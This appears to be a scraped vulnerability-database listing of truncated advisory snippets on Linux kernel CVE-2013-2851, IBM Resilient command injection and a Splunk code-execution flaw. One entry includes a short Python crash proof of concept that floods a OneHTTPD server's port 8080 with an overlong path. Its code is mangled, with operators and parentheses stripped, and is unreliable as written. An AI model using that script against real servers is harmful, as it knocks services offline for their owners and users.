Unity Linux 20.1050e / 20.1060e / 20.1070e Security Update: kernel (UTSA-2026-001082)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-001082 advisory. Format string vulnerability in the registerdisk function in block/genhd.c in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root...

IBM Resilient Command Injection Vulnerability

IBM Resilient is a suite of incident response platforms from IBM in the United States. The platform supports functions such as incident response process orchestration and incident management. Resilient has a security vulnerability that can be exploited by an attacker to inject malicious commands...

Security Bulletin: IBM Resilient SOAR could allow a privileged user to inject malicious commands through Python3 scripting (CVE-2020-4636).

Summary It was possible for a privileged user to inject malicious commands through Python3 scripting, using the sys module, in a Beta version of Resilient. Vulnerability Details CVEID: CVE-2020-4636 DESCRIPTION: IBM Resilient could allow a privileged user to inject malicious commands through...

OneHTTPD 0.8 - Crash PoC

Exploit for windows platform in category dos / poc from requests import get,ConnectionError as cerror from sys import argv iflenargv!=2: print '%s host' % argv0 else: buff = '/'245 script,host=argv try: get'http://'+host+':8080/'+buff except cerror: exit1 0day.today 2018-04-02...

kernel: block: passing disk names as format strings

Format string vulnerability in the registerdisk function in block/genhd.c in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and writing format string specifiers to /sys/module/mdmod/parameters/newarray in order to create a crafted /dev/md device nam...

CVE-2013-2851

Format string vulnerability in the registerdisk function in block/genhd.c in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and writing format string specifiers to /sys/module/mdmod/parameters/newarray in order to create a crafted /dev/md device nam...

UBUNTU-CVE-2013-2851

Format string vulnerability in the registerdisk function in block/genhd.c in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and writing format string specifiers to /sys/module/mdmod/parameters/newarray in order to create a crafted /dev/md device nam...

CVE-2011-4642

mappy.py in Splunk Web in Splunk 4.2.x before 4.2.5 does not properly restrict use of the mappy command to access Python classes, which allows remote authenticated administrators to execute arbitrary code by leveraging the sys module in a request to the search application, as demonstrated by a...